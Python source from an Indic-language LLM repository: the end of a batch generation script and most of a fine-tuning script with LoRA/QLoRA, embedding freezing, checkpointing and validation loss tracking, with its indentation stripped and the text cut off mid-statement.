assert all(
"role" in message and "content" in message for message in instance["messages"]
), "Each message should have a `role` and a `content` field."
prompt = eval(args.chat_formatting_function)(instance["messages"], add_bos=False)
elif "prompt" in instance:
if args.use_chat_format:
messages = [{"role": "user", "content": instance["prompt"]}]
prompt = chat_formatting_function(messages, add_bos=False)
else:
prompt = instance["prompt"]
else:
raise ValueError("Either `messages` or `prompt` should be in the instance.")
prompts.append(prompt)
if args.use_vllm:
model = vllm.LLM(
model=args.model_name_or_path,
tokenizer=args.tokenizer_name_or_path
if args.tokenizer_name_or_path
else args.model_name_or_path,
tokenizer_mode="slow" if args.use_slow_tokenizer else "auto",
)
sampling_params = vllm.SamplingParams(
temperature=args.temperature if args.do_sample else 0,
top_p=args.top_p,
max_tokens=args.max_new_tokens,
)
outputs = model.generate(prompts, sampling_params)
outputs = [it.outputs[0].text for it in outputs]
else:
model, tokenizer = load_hf_lm_and_tokenizer(
model_name_or_path=args.model_name_or_path,
tokenizer_name_or_path=args.tokenizer_name_or_path,
load_in_8bit=args.load_in_8bit,
device_map="balanced_low_0" if torch.cuda.device_count() > 1 else "auto",
gptq_model=args.gptq,
use_fast_tokenizer=not args.use_slow_tokenizer,
)
outputs = generate_completions(
model=model,
tokenizer=tokenizer,
prompts=prompts,
batch_size=args.batch_size,
max_new_tokens=args.max_new_tokens,
do_sample=args.do_sample,
temperature=args.temperature,
top_p=args.top_p,
)
with open(args.output_file, "w") as f:
for instance, output in zip(instances, outputs):
instance["output"] = output
f.write(json.dumps(instance) + "\n")
elif args.openai_engine is not None:
query_openai_chat_model(
engine=args.openai_engine,
instances=instances,
output_path=args.output_file,
batch_size=args.batch_size,
temperature=args.temperature,
top_p=args.top_p,
max_tokens=args.max_new_tokens,
)
else:
raise ValueError("Either model_name_or_path or openai_engine should be provided.")
print("Done.") | 8,008 | Python | .py | 191 | 32.371728 | 150 | 0.602768 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,507 | finetune.py | adithya-s-k_Indic-llm/archives/eval/finetune.py | #!/usr/bin/env python
# coding=utf-8
import argparse
import logging
import math
import os
import json
import random
import datasets
from open_instruct.utils import InitializationScheme
import torch
from functools import partial
from accelerate import Accelerator
from accelerate.logging import get_logger
from accelerate.utils import set_seed
from datasets import load_dataset, load_from_disk
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
import deepspeed
import transformers
from transformers import (
AutoConfig,
AutoModelForCausalLM,
AutoTokenizer,
LlamaTokenizer,
LlamaTokenizerFast,
SchedulerType,
DataCollatorForSeq2Seq,
get_scheduler,
GPTNeoXTokenizerFast,
GPT2Tokenizer,
OPTForCausalLM,
BitsAndBytesConfig,
)
from peft import LoraConfig, TaskType, get_peft_model, prepare_model_for_kbit_training
logger = get_logger(__name__)
def parse_args():
parser = argparse.ArgumentParser(
description="Finetune a transformers model on a causal language modeling task"
)
parser.add_argument(
"--dataset_name",
type=str,
default=None,
help="The name of the dataset to use (via the datasets library).",
)
parser.add_argument(
"--preprocessed_dataset",
action="store_true",
help="If passed, will use a preprocessed dataset which is already tokenized and formatted for causal language modeling.",
)
parser.add_argument(
"--skip_special_tokens",
action="store_true",
help="If passed, will skip special tokens when computing the loss.",
)
parser.add_argument(
"--dataset_config_name",
type=str,
default=None,
help="The configuration name of the dataset to use (via the datasets library).",
)
parser.add_argument(
"--train_file",
nargs="+",
type=str,
default=None,
help="File(s) containing the training data. Usually jsonl in case of raw datasets.",
)
parser.add_argument(
"--val_file",
nargs="+",
type=str,
default=None,
help="File(s) containing the validation data. Usually jsonl in case of raw datasets.",
)
parser.add_argument(
"--model_name_or_path",
type=str,
help="Path to pretrained model or model identifier from huggingface.co/models.",
required=False,
)
parser.add_argument(
"--from_scratch",
action="store_true",
help="If passed, will train the model from scratch instead of from pretrained.",
)
parser.add_argument(
"--config_name",
type=str,
default=None,
help="Pretrained config name or path if not the same as model_name",
)
parser.add_argument(
"--use_lora",
action="store_true",
help="If passed, will use LORA (low-rank parameter-efficient training) to train the model.",
)
parser.add_argument(
"--lora_rank",
type=int,
default=64,
help="The rank of lora.",
)
parser.add_argument(
"--lora_alpha",
type=float,
default=16,
help="The alpha parameter of lora.",
)
parser.add_argument(
"--lora_dropout",
type=float,
default=0.1,
help="The dropout rate of lora modules.",
)
parser.add_argument(
"--lora_target_modules",
type=str,
default=None,
nargs="+",
help="Modules to be augmented."
)
parser.add_argument(
"--use_flash_attn",
action="store_true",
help="If passed, will use flash attention to train the model.",
)
parser.add_argument(
"--tokenizer_name",
type=str,
default=None,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--use_slow_tokenizer",
action="store_true",
help="If passed, will use a slow tokenizer (not backed by the 🤗 Tokenizers library).",
)
parser.add_argument(
"--max_seq_length",
type=int,
default=512,
help="The maximum total sequence length (prompt+completion) of each training example.",
)
parser.add_argument(
"--per_device_train_batch_size",
type=int,
default=8,
help="Batch size (per device) for the training dataloader.",
)
parser.add_argument(
"--per_device_val_batch_size",
type=int,
default=8,
help="Batch size (per device) for the validation dataloader.",
)
parser.add_argument(
"--learning_rate",
type=float,
default=5e-5,
help="Initial learning rate (after the potential warmup period) to use.",
)
parser.add_argument("--weight_decay", type=float, default=0.0, help="Weight decay to use.")
parser.add_argument(
"--num_train_epochs",
type=int,
default=3,
help="Total number of training epochs to perform.",
)
parser.add_argument(
"--max_train_steps",
type=int,
default=None,
help="Total number of training steps to perform. If provided, overrides num_train_epochs.",
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument(
"--lr_scheduler_type",
type=SchedulerType,
default="linear",
help="The scheduler type to use.",
choices=[
"linear",
"cosine",
"cosine_with_restarts",
"polynomial",
"constant",
"constant_with_warmup",
],
)
parser.add_argument(
"--warmup_ratio",
type=float,
default=0,
help="Ratio of total training steps used for warmup.",
)
parser.add_argument(
"--output_dir", type=str, default=None, help="Where to store the final model."
)
parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.")
parser.add_argument(
"--preprocessing_num_workers",
type=int,
default=None,
help="The number of processes to use for the preprocessing.",
)
parser.add_argument(
"--overwrite_cache",
action="store_true",
help="Overwrite the cached training and evaluation sets",
)
parser.add_argument(
"--checkpointing_steps",
type=str,
default=None,
help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.",
)
parser.add_argument(
"--logging_steps",
type=int,
default=None,
help="Log the training loss and learning rate every logging_steps steps.",
)
parser.add_argument(
"--resume_from_checkpoint",
type=str,
default=None,
help="If the training should continue from a checkpoint folder.",
)
parser.add_argument(
"--with_tracking",
action="store_true",
help="Whether to enable experiment trackers for logging.",
)
parser.add_argument(
"--report_to",
type=str,
default="all",
help=(
'The integration to report the results and logs to. Supported platforms are `"tensorboard"`,'
' `"wandb"`, `"comet_ml"` and `"clearml"`. Use `"all"` (default) to report to all integrations.'
"Only applicable when `--with_tracking` is passed."
),
)
parser.add_argument(
"--low_cpu_mem_usage",
action="store_true",
help=(
"It is an option to create the model as an empty shell, then only materialize its parameters when the pretrained weights are loaded."
"If passed, LLM loading time and RAM consumption will be benefited."
),
)
parser.add_argument(
"--gradient_checkpointing",
action="store_true",
help=("Turn on gradient checkpointing. Saves memory but slows training."),
)
parser.add_argument(
"--use_qlora",
action="store_true",
help=(
"Use qLoRA training - main thing is initialising model in quantised form. Not compatible with deepspeed."
),
)
parser.add_argument(
"--clip_grad_norm",
type=float,
default=-1,
help="Clip gradient norm. Not compatible with deepspeed (use deepspeed config instead).",
)
parser.add_argument(
"--use_8bit_optimizer",
action="store_true",
help="Use 8bit optimizer from bitsandbytes. Not compatible with deepspeed (use deepspeed config instead).",
)
parser.add_argument(
"--embedding_idx_to_freeze_up_to",
type=int,
default=-1,
help="The index of the embedding layer to freeze up to. -1 means no embedding layer will be frozen.",
)
parser.add_argument(
"--components_to_freeze",
nargs="+",
type=str,
default=None,
help="The components to freeze. If not specified, nothing will be frozen. Possible values can be embed_tokens, layers, layers.N (N=0 to 31), self_attn, (q/k/v)_proj, rotary_emb, mlp, gate_proj, up_proj, down_proj, lm_head, norm, input_layernorm, post_attention_layernorm.",
)
parser.add_argument(
"--init_scheme",
type=str,
default="normal",
help="Specify which initialization scheme to use for models trained from scratched",
choices=[
"normal",
"scaled_normal",
"xavier_uniform",
"xavier_normal",
"wang_init",
"small_init",
"small_and_wang_init",
"scaled_biderman",
],
)
args = parser.parse_args()
# Sanity checks
if args.dataset_name is None and args.train_file is None:
raise ValueError("Need either a dataset name or a training file.")
else:
if args.train_file is not None:
if args.preprocessed_dataset:
print("Preprocessed dataset will be loaded from `train_file` and `val_file`.")
else:
extension = args.train_file[0].split(".")[-1]
assert extension in ["json", "jsonl"], "`train_file` should be a json/jsonl file."
if args.val_file is not None:
extension = args.val_file[0].split(".")[-1]
assert extension in ["json", "jsonl"], "`val_file` should be a json/jsonl file."
return args
def identity(example, tokenizer, max_seq_length):
return example
def encode_with_prompt_completion_format(example, tokenizer, max_seq_length):
"""
Here we assume each example has 'prompt' and 'completion' fields.
We concatenate prompt and completion and tokenize them together because otherwise prompt will be padded/trancated
and it doesn't make sense to follow directly with the completion.
"""
# if prompt doesn't end with space and completion doesn't start with space, add space
if not example["prompt"].endswith((" ", "\n", "\t")) and not example["completion"].startswith(
(" ", "\n", "\t")
):
example_text = example["prompt"] + " " + example["completion"]
else:
example_text = example["prompt"] + example["completion"]
example_text = example_text + tokenizer.eos_token
tokenized_example = tokenizer(
example_text, return_tensors="pt", max_length=max_seq_length, truncation=True
)
input_ids = tokenized_example.input_ids
labels = input_ids.clone()
tokenized_prompt = tokenizer(
example["prompt"], return_tensors="pt", max_length=max_seq_length, truncation=True
)
# mask the prompt part for avoiding loss
labels[:, : tokenized_prompt.input_ids.shape[1]] = -100
attention_mask = torch.ones_like(input_ids)
return {
"input_ids": input_ids.flatten(),
"labels": labels.flatten(),
"attention_mask": attention_mask.flatten(),
}
def encode_with_messages_format(example, tokenizer, max_seq_length):
"""
Here we assume each example has a 'messages' field Each message is a dict with 'role' and 'content' fields.
We concatenate all messages with the roles as delimiters and tokenize them together.
"""
messages = example["messages"]
if len(messages) == 0:
raise ValueError("messages field is empty.")
def _concat_messages(messages):
message_text = ""
for message in messages:
if message["role"] == "system":
message_text += "<|system|>\n" + message["content"].strip() + "\n"
elif message["role"] == "user":
message_text += "<|user|>\n" + message["content"].strip() + "\n"
elif message["role"] == "assistant":
message_text += (
"<|assistant|>\n" + message["content"].strip() + tokenizer.eos_token + "\n"
)
else:
raise ValueError("Invalid role: {}".format(message["role"]))
return message_text
example_text = _concat_messages(messages).strip()
tokenized_example = tokenizer(
example_text, return_tensors="pt", max_length=max_seq_length, truncation=True
)
input_ids = tokenized_example.input_ids
labels = input_ids.clone()
# mask the non-assistant part for avoiding loss
for message_idx, message in enumerate(messages):
if message["role"] != "assistant":
if message_idx == 0:
message_start_idx = 0
else:
message_start_idx = tokenizer(
_concat_messages(messages[:message_idx]),
return_tensors="pt",
max_length=max_seq_length,
truncation=True,
).input_ids.shape[1]
if message_idx < len(messages) - 1 and messages[message_idx + 1]["role"] == "assistant":
# here we also ignore the role of the assistant
messages_so_far = _concat_messages(messages[: message_idx + 1]) + "<|assistant|>\n"
else:
messages_so_far = _concat_messages(messages[: message_idx + 1])
message_end_idx = tokenizer(
messages_so_far, return_tensors="pt", max_length=max_seq_length, truncation=True
).input_ids.shape[1]
labels[:, message_start_idx:message_end_idx] = -100
if message_end_idx >= max_seq_length:
break
attention_mask = torch.ones_like(input_ids)
return {
"input_ids": input_ids.flatten(),
"labels": labels.flatten(),
"attention_mask": attention_mask.flatten(),
}
def save_with_accelerate(accelerator, model, tokenizer, output_dir, args):
unwrapped_model = accelerator.unwrap_model(model)
# When doing multi-gpu training, we need to use accelerator.get_state_dict(model) to get the state_dict.
# Otherwise, sometimes the model will be saved with only part of the parameters.
# Also, accelerator needs to use the wrapped model to get the state_dict.
state_dict = accelerator.get_state_dict(model)
if args.use_lora:
# When using lora, the unwrapped model is a PeftModel, which doesn't support the is_main_process
# and has its own save_pretrained function for only saving lora modules.
# We have to manually specify the is_main_process outside the save_pretrained function.
if accelerator.is_main_process:
unwrapped_model.save_pretrained(output_dir, state_dict=state_dict)
if args.embedding_idx_to_freeze_up_to != -1:
# We need to save the embeddings and lm head as well
embeddings = deepspeed.utils.safe_get_full_fp32_param(
model.module.get_input_embeddings().weight
)
if accelerator.is_main_process:
accelerator.save(embeddings, os.path.join(output_dir, "embeddings.pkl"))
del embeddings
embeddings = deepspeed.utils.safe_get_full_fp32_param(
model.module.get_output_embeddings().weight
)
if accelerator.is_main_process:
accelerator.save(embeddings, os.path.join(output_dir, "lm_head.pkl"))
del embeddings
torch.cuda.empty_cache()
else:
unwrapped_model.save_pretrained(
output_dir,
is_main_process=accelerator.is_main_process,
save_function=accelerator.save,
state_dict=state_dict,
)
def main():
args = parse_args()
# A hacky way to make llama work with flash attention
# if args.use_flash_attn:
# transformers library now supports flash attention for llama 2 model
# no need to add flash attention monkey patch anymore
# from llama_flash_attn_monkey_patch import replace_llama_attn_with_flash_attn
# replace_llama_attn_with_flash_attn()
# from bloom_flash_attn_monkey_patch import replace_bloom_attn_with_flash_attn
# replace_bloom_attn_with_flash_attn()
# Initialize the accelerator. We will let the accelerator handle device placement for us in this example.
# If we're using tracking, we also need to initialize it here and it will by default pick up all supported trackers
# in the environment
accelerator_log_kwargs = {}
if args.with_tracking:
accelerator_log_kwargs["log_with"] = args.report_to
accelerator_log_kwargs["project_dir"] = args.output_dir
accelerator = Accelerator(
gradient_accumulation_steps=args.gradient_accumulation_steps, **accelerator_log_kwargs
)
# Make one log on every process with the configuration for debugging.
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
logger.info(accelerator.state, main_process_only=False)
if accelerator.is_local_main_process:
datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
else:
datasets.utils.logging.set_verbosity_error()
transformers.utils.logging.set_verbosity_error()
# If passed along, set the training seed now.
if args.seed is not None:
set_seed(args.seed)
if accelerator.is_main_process:
if args.output_dir is not None:
os.makedirs(args.output_dir, exist_ok=True)
# save the script arguments
with open(os.path.join(args.output_dir, "hparams.json"), "w") as fp:
fp.write(json.dumps(vars(args), indent=2))
accelerator.wait_for_everyone()
if args.preprocessed_dataset:
# load the preprocessed data from file on the disk if available
print("Loading preprocessed dataset...")
raw_datasets = {}
all_train_raw_datasets = []
for dataset_name in args.train_file:
all_train_raw_datasets.append(load_from_disk(dataset_name))
raw_datasets["train"] = datasets.concatenate_datasets(all_train_raw_datasets)
raw_datasets["train"].shuffle()
if args.val_file is not None:
all_val_raw_datasets = []
for dataset_name in args.val_file:
all_val_raw_datasets.append(load_from_disk(dataset_name))
raw_datasets["validation"] = datasets.concatenate_datasets(all_val_raw_datasets)
raw_datasets["validation"].shuffle()
else:
if args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(args.dataset_name, args.dataset_config_name)
else:
data_files = {}
dataset_args = {}
if args.train_file is not None:
data_files["train"] = args.train_file
raw_datasets = load_dataset("json", data_files=data_files, **dataset_args)
# Load pretrained model and tokenizer
if args.config_name:
config = AutoConfig.from_pretrained(args.config_name)
elif args.model_name_or_path:
config = AutoConfig.from_pretrained(args.model_name_or_path)
else:
raise ValueError(
"You are instantiating a new config instance from scratch. This is not supported by this script."
)
if args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(
args.tokenizer_name, use_fast=not args.use_slow_tokenizer
)
elif args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(
args.model_name_or_path, use_fast=not args.use_slow_tokenizer
)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
if args.model_name_or_path:
use_flash_attention_2 = (
args.use_flash_attn if "bloom" not in args.model_name_or_path else False,
)
if args.use_qlora:
bnb_config = BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_use_double_quant=True,
bnb_4bit_quant_type="nf4",
bnb_4bit_compute_dtype=torch.bfloat16,
)
device_index = accelerator.local_process_index
device_map = {"": device_index} # force data-parallel training.
model = AutoModelForCausalLM.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
load_in_4bit=True,
quantization_config=bnb_config,
device_map=device_map,
torch_dtype=torch.bfloat16,
use_flash_attention_2=use_flash_attention_2,
)
else:
model = AutoModelForCausalLM.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
low_cpu_mem_usage=args.low_cpu_mem_usage,
use_flash_attention_2=use_flash_attention_2,
)
else:
logger.info("Training new model from scratch")
model = AutoModelForCausalLM.from_config(config)
config.init_scheme = args.init_scheme
initialize_model_weights = InitializationScheme(config)
initialize_model_weights._init_weights(model)
logger.info("Total parameters: {}".format(model.num_parameters()))
if args.components_to_freeze is not None:
for component in args.components_to_freeze:
for model_component, parameter in model.named_parameters():
if component in model_component:
parameter.requires_grad = False
print("Freezing {}".format(model_component))
# no default pad token for llama!
# here we add all special tokens again, because the default ones are not in the special_tokens_map
if args.skip_special_tokens:
pass
else:
if isinstance(tokenizer, LlamaTokenizer) or isinstance(tokenizer, LlamaTokenizerFast):
num_added_tokens = tokenizer.add_special_tokens(
{
"bos_token": "<s>",
"eos_token": "</s>",
"unk_token": "<unk>",
"pad_token": "<pad>",
}
)
assert num_added_tokens in [
0,
1,
], "LlamaTokenizer should only add one special token - the pad_token, or no tokens if pad token present."
elif isinstance(tokenizer, GPTNeoXTokenizerFast):
num_added_tokens = tokenizer.add_special_tokens(
{
"pad_token": "<pad>",
}
)
assert (
num_added_tokens == 1
), "GPTNeoXTokenizer should only add one special token - the pad_token."
elif isinstance(tokenizer, GPT2Tokenizer) and isinstance(model, OPTForCausalLM):
num_added_tokens = tokenizer.add_special_tokens({"unk_token": "<unk>"})
# We resize the embeddings only when necessary to avoid index errors. If you are creating a model from scratch
# on a small vocab and want a smaller embedding size, remove this test.
embedding_size = model.get_input_embeddings().weight.shape[0]
if len(tokenizer) > embedding_size:
model.resize_token_embeddings(len(tokenizer))
if args.use_lora:
if args.use_qlora:
model = prepare_model_for_kbit_training(
model, use_gradient_checkpointing=args.gradient_checkpointing
)
logger.info("Initializing LORA model...")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
inference_mode=False,
r=args.lora_rank,
lora_alpha=args.lora_alpha,
lora_dropout=args.lora_dropout,
target_modules=args.lora_target_modules,
)
model = get_peft_model(model, peft_config)
# peft breaks flash attention due to casting norms to fp32. This fixes it back up.
# See https://github.com/huggingface/peft/issues/790
# from llama_flash_attn_monkey_patch import upcast_layer_for_flash_attention
# model = upcast_layer_for_flash_attention(model, torch.bfloat16)
model.print_trainable_parameters()
if args.embedding_idx_to_freeze_up_to != -1:
print("Freezing embeddings up to index {}".format(args.embedding_idx_to_freeze_up_to))
def hook(grad):
grad[: args.embedding_idx_to_freeze_up_to].zero_()
return grad
if args.use_lora:
print(
"Setting embeddings and lm head as trainable and then we will remove gradients up to index {}".format(
args.embedding_idx_to_freeze_up_to
)
)
model.get_input_embeddings().weight.requires_grad = True
model.get_output_embeddings().weight.requires_grad = True
model.print_trainable_parameters()
model.get_input_embeddings().weight.register_hook(hook)
model.get_output_embeddings().weight.register_hook(hook)
# Preprocessing the datasets.
if args.preprocessed_dataset:
encode_function = partial(
identity,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
)
with accelerator.main_process_first():
lm_datasets = {}
for split in raw_datasets.keys():
lm_datasets[split] = raw_datasets[split].map(
encode_function,
batched=False,
num_proc=args.preprocessing_num_workers,
load_from_cache_file=not args.overwrite_cache,
remove_columns=[
name
for name in raw_datasets["train"].column_names
if name not in ["input_ids", "labels", "attention_mask"]
],
desc="Reformatting instruction data",
)
lm_datasets[split].set_format(type="pt")
train_dataset = lm_datasets["train"]
if args.val_file is not None:
val_dataset = lm_datasets["validation"]
else:
if (
"prompt" in raw_datasets["train"].column_names
and "completion" in raw_datasets["train"].column_names
):
encode_function = partial(
encode_with_prompt_completion_format,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
)
elif "messages" in raw_datasets["train"].column_names:
encode_function = partial(
encode_with_messages_format,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
)
else:
raise ValueError(
"You need to have either 'prompt'&'completion' or 'messages' in your column names."
)
with accelerator.main_process_first():
lm_datasets = raw_datasets.map(
encode_function,
batched=False,
num_proc=args.preprocessing_num_workers,
load_from_cache_file=not args.overwrite_cache,
remove_columns=[
name
for name in raw_datasets["train"].column_names
if name not in ["input_ids", "labels", "attention_mask"]
],
desc="Tokenizing and reformatting instruction data",
)
lm_datasets.set_format(type="pt")
lm_datasets = lm_datasets.filter(lambda example: (example["labels"] != -100).any())
train_dataset = lm_datasets["train"]
if args.val_file is not None:
val_dataset = lm_datasets["validation"]
# Log a few random samples from the training set:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
# DataLoaders creation:
train_dataloader = DataLoader(
train_dataset,
shuffle=True,
collate_fn=DataCollatorForSeq2Seq(tokenizer=tokenizer, model=model, padding="longest"),
batch_size=args.per_device_train_batch_size,
)
if args.val_file is not None:
val_dataloader = DataLoader(
val_dataset,
shuffle=False,
collate_fn=DataCollatorForSeq2Seq(tokenizer=tokenizer, model=model, padding="longest"),
batch_size=args.per_device_val_batch_size,
)
# Optimizer
# Split weights in two groups, one with weight decay and the other not.
no_decay = ["bias", "layer_norm.weight"]
optimizer_grouped_parameters = [
{
"params": [
p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)
],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
if args.use_qlora:
from bitsandbytes.optim import AdamW
optimizer = AdamW(
optimizer_grouped_parameters,
lr=args.learning_rate,
optim_bits=8 if args.use_8bit_optimizer else 32,
is_paged=True,
)
else:
optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.learning_rate)
# Scheduler and math around the number of training steps.
overrode_max_train_steps = False
num_update_steps_per_epoch = math.ceil(
len(train_dataloader) / args.gradient_accumulation_steps / accelerator.num_processes
)
if args.max_train_steps is None:
args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
overrode_max_train_steps = True
# Create the learning rate scheduler.
# Note: the current accelerator.step() calls the .step() of the real scheduler for the `num_processes` times. This is because they assume
# the user initialize the scheduler with the entire training set. In the case of data parallel training, each process only
# sees a subset (1/num_processes) of the training set. So each time the process needs to update the lr multiple times so that the total
# number of updates in the end matches the num_training_steps here.
# Here we need to set the num_training_steps to either using the entire training set (when epochs is specified) or we need to multiply the
# num_training_steps by num_processes so that the total number of updates matches the num_training_steps.
num_training_steps_for_scheduler = (
args.max_train_steps
if overrode_max_train_steps
else args.max_train_steps * accelerator.num_processes
)
lr_scheduler = get_scheduler(
name=args.lr_scheduler_type,
optimizer=optimizer,
num_training_steps=num_training_steps_for_scheduler,
num_warmup_steps=int(num_training_steps_for_scheduler * args.warmup_ratio),
)
if not args.use_lora and args.gradient_checkpointing:
print("Using gradient checkpointing with full fine tuning")
model.gradient_checkpointing_enable()
# Prepare everything with `accelerator`.
if args.val_file is not None:
model, optimizer, train_dataloader, val_dataloader, lr_scheduler = accelerator.prepare(
model, optimizer, train_dataloader, val_dataloader, lr_scheduler
)
else:
model, optimizer, train_dataloader, lr_scheduler = accelerator.prepare(
model, optimizer, train_dataloader, lr_scheduler
)
# # We need to recalculate our total training steps as the size of the training dataloader may have changed.
# num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
# if overrode_max_train_steps:
# args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
# # Afterwards we recalculate our number of training epochs
# args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch)
# Figure out how many steps we should save the Accelerator states
checkpointing_steps = args.checkpointing_steps
if checkpointing_steps is not None and checkpointing_steps.isdigit():
checkpointing_steps = int(checkpointing_steps)
# We need to initialize the trackers we use, and also store our configuration.
# The trackers initializes automatically on the main process.
if args.with_tracking:
experiment_config = vars(args)
# TensorBoard cannot log Enums, need the raw value
experiment_config["lr_scheduler_type"] = experiment_config["lr_scheduler_type"].value
accelerator.init_trackers("indic_instruct", experiment_config)
# Train!
total_batch_size = (
args.per_device_train_batch_size
* accelerator.num_processes
* args.gradient_accumulation_steps
)
logger.info("***** Running training *****")
logger.info(f" Num examples = {len(train_dataset)}")
logger.info(f" Num Epochs = {args.num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {args.per_device_train_batch_size}")
logger.info(
f" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}"
)
logger.info(f" Gradient Accumulation steps = {args.gradient_accumulation_steps}")
logger.info(f" Total optimization steps = {args.max_train_steps}")
# Only show the progress bar once on each machine.
progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)
completed_steps = 0
starting_epoch = 0
# Potentially load in the weights and states from a previous save
if args.resume_from_checkpoint:
if args.resume_from_checkpoint is not None or args.resume_from_checkpoint != "":
checkpoint_path = args.resume_from_checkpoint
path = os.path.basename(args.resume_from_checkpoint)
else:
# Get the most recent checkpoint
dirs = [f.name for f in os.scandir(os.getcwd()) if f.is_dir()]
dirs.sort(key=os.path.getctime)
path = dirs[-1] # Sorts folders by date modified, most recent checkpoint is the last
checkpoint_path = path
path = os.path.basename(checkpoint_path)
accelerator.print(f"Resumed from checkpoint: {checkpoint_path}")
accelerator.load_state(path)
# Extract `epoch_{i}` or `step_{i}`
training_difference = os.path.splitext(path)[0]
if "epoch" in training_difference:
starting_epoch = int(training_difference.replace("epoch_", "")) + 1
resume_step = None
completed_steps = starting_epoch * num_update_steps_per_epoch
else:
# need to multiply `gradient_accumulation_steps` to reflect real steps
resume_step = (
int(training_difference.replace("step_", "")) * args.gradient_accumulation_steps
)
starting_epoch = resume_step // len(train_dataloader)
completed_steps = resume_step // args.gradient_accumulation_steps
resume_step -= starting_epoch * len(train_dataloader)
# update the progress_bar if load from checkpoint
progress_bar.update(completed_steps)
for epoch in range(starting_epoch, args.num_train_epochs):
model.train()
total_loss = 0
if args.resume_from_checkpoint and epoch == starting_epoch and resume_step is not None:
# We skip the first `n` batches in the dataloader when resuming from a checkpoint
active_dataloader = accelerator.skip_first_batches(train_dataloader, resume_step)
else:
active_dataloader = train_dataloader
for step, batch in enumerate(active_dataloader):
## For a preprocessed dataset, if the labels are not stored in the dataset, we need to just use the input_ids as labels
if "labels" not in batch:
batch["labels"] = batch["input_ids"].clone()
if "attention_mask" not in batch:
batch["attention_mask"] = torch.ones_like(batch["input_ids"])
with accelerator.accumulate(model):
outputs = model(**batch, use_cache=False)
loss = outputs.loss
# We keep track of the loss at each logged step
total_loss += loss.detach().float()
accelerator.backward(loss)
# clip gradient norm. don't do this with deepspeed
if accelerator.sync_gradients and args.clip_grad_norm > 0:
accelerator.clip_grad_norm_(model.parameters(), args.clip_grad_norm)
optimizer.step()
optimizer.zero_grad()
lr_scheduler.step()
# Checks if the accelerator has performed an optimization step behind the scenes
if accelerator.sync_gradients:
progress_bar.update(1)
completed_steps += 1
if args.logging_steps and completed_steps % args.logging_steps == 0:
avg_loss = (
accelerator.gather(total_loss).mean().item()
/ args.gradient_accumulation_steps
/ args.logging_steps
)
logger.info(
f" Step: {completed_steps}, LR: {lr_scheduler.get_last_lr()[0]}, Loss: {avg_loss}"
)
if args.with_tracking:
accelerator.log(
{
"learning_rate": lr_scheduler.get_last_lr()[0],
"train_loss": avg_loss,
},
step=completed_steps,
)
total_loss = 0
if isinstance(checkpointing_steps, int):
if completed_steps % checkpointing_steps == 0:
if args.val_file is not None:
# ----------------------------------------------------------------------------
# evaluation on held out set
# ----------------------------------------------------------------------------
val_total_loss = 0
for step, batch in enumerate(val_dataloader):
if "labels" not in batch:
batch["labels"] = batch["input_ids"].clone()
if "attention_mask" not in batch:
batch["attention_mask"] = torch.ones_like(batch["input_ids"])
with torch.inference_mode():
outputs = model(**batch, use_cache=False)
loss = outputs.loss
val_total_loss += loss.detach().float()
avg_val_loss = (
accelerator.gather(val_total_loss).mean().item()
/ args.gradient_accumulation_steps
/ len(val_dataloader)
)
logger.info(f" Step: {completed_steps}, Val Loss: {avg_val_loss}")
if args.with_tracking:
accelerator.log(
{
"val_loss": avg_val_loss,
},
step=completed_steps,
)
if avg_val_loss < best_loss:
best_loss = avg_val_loss
output_dir = f"best"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(
accelerator, model, tokenizer, output_dir, args
)
# ----------------------------------------------------------------------------
output_dir = f"step_{completed_steps}"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, output_dir, args)
if completed_steps >= args.max_train_steps:
break
if args.checkpointing_steps == "epoch":
if args.val_file is not None:
# ----------------------------------------------------------------------------
# evaluation on held out set
# ----------------------------------------------------------------------------
val_total_loss = 0
for step, batch in enumerate(val_dataloader):
if "labels" not in batch:
batch["labels"] = batch["input_ids"].clone()
if "attention_mask" not in batch:
batch["attention_mask"] = torch.ones_like(batch["input_ids"])
with torch.inference_mode():
outputs = model(**batch, use_cache=False)
loss = outputs.loss
val_total_loss += loss.detach().float()
avg_val_loss = (
